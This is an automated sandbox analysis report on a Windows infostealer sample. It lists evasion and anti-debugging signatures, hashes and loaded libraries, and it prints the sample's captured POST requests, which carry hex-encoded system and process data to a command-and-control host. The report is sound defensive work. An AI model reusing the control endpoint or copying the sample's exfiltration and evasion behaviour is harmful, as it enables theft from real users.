Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2OJYjm4J1B.exe

Overview

General Information

Sample name:2OJYjm4J1B.exe
renamed because original name is a hash value
Original sample name:49f7c4981eb383aed2c3f6588545b605.exe
Analysis ID:1579639
MD5:49f7c4981eb383aed2c3f6588545b605
SHA1:fa4bf7467762247e1c5933fe25c39875b34703a1
SHA256:4d44e006134267879fc41b2e837319fbc5b97210ad2ed3902ecfd4fd98af93e7
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 2OJYjm4J1B.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\2OJYjm4J1B.exe" MD5: 49F7C4981EB383AED2C3F6588545B605)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 2OJYjm4J1B.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 2OJYjm4J1B.exeReversingLabs: Detection: 69%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 2OJYjm4J1B.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0027DCF0
Source: 2OJYjm4J1B.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_002BA5B0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002BB560
Source: 2OJYjm4J1B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002529FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 501223Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 33 32 35 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 209Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031A8C0 recvfrom,0_2_0031A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 501223Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 33 32 35 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1870769984.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1870769984.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1
Source: 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850:
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2OJYjm4J1B.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 2OJYjm4J1B.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: 2OJYjm4J1B.exeStatic PE information: section name: .idata
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002605B00_2_002605B0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00266FA00_2_00266FA0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0028F1000_2_0028F100
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031B1800_2_0031B180
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005DE0300_2_005DE030
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003200E00_2_003200E0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002B62100_2_002B6210
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031C3200_2_0031C320
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003204200_2_00320420
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005A44100_2_005A4410
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025E6200_2_0025E620
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031C7700_2_0031C770
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005B67300_2_005B6730
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002BA7F00_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005D47800_2_005D4780
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0030C9000_2_0030C900
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025A9600_2_0025A960
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002649400_2_00264940
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00426AC00_2_00426AC0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0050AAC00_2_0050AAC0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003E4B600_2_003E4B60
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0050AB2C0_2_0050AB2C
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025CBB00_2_0025CBB0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005C8BF00_2_005C8BF0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005DCC700_2_005DCC70
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005D4D400_2_005D4D40
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00410D800_2_00410D80
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005CCD800_2_005CCD80
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0056AE300_2_0056AE30
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00274F700_2_00274F70
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031EF900_2_0031EF90
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00318F900_2_00318F90
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005A2F900_2_005A2F90
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002610E60_2_002610E6
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005BD4300_2_005BD430
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005C35B00_2_005C35B0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005E17800_2_005E1780
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003098800_2_00309880
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005A99200_2_005A9920
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005D3A700_2_005D3A70
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005C1BD00_2_005C1BD0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00291BE00_2_00291BE0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005B7CC00_2_005B7CC0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00509C800_2_00509C80
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00265DB00_2_00265DB0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00407220 appears 98 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002571E0 appears 47 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0026CD40 appears 78 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002950A0 appears 91 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0025CAA0 appears 62 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002575A0 appears 647 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00295340 appears 45 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0025C960 appears 36 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0042CBC0 appears 99 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00294F40 appears 311 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00294FD0 appears 258 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 003344A0 appears 70 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0026CCD0 appears 54 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002573F0 appears 110 times
Source: 2OJYjm4J1B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 2OJYjm4J1B.exeStatic PE information: Section: oshltrdl ZLIB complexity 0.9944817435143182
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002529FF
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 2OJYjm4J1B.exeReversingLabs: Detection: 69%
Source: 2OJYjm4J1B.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2OJYjm4J1B.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: windowscodecs.dllJump to behavior
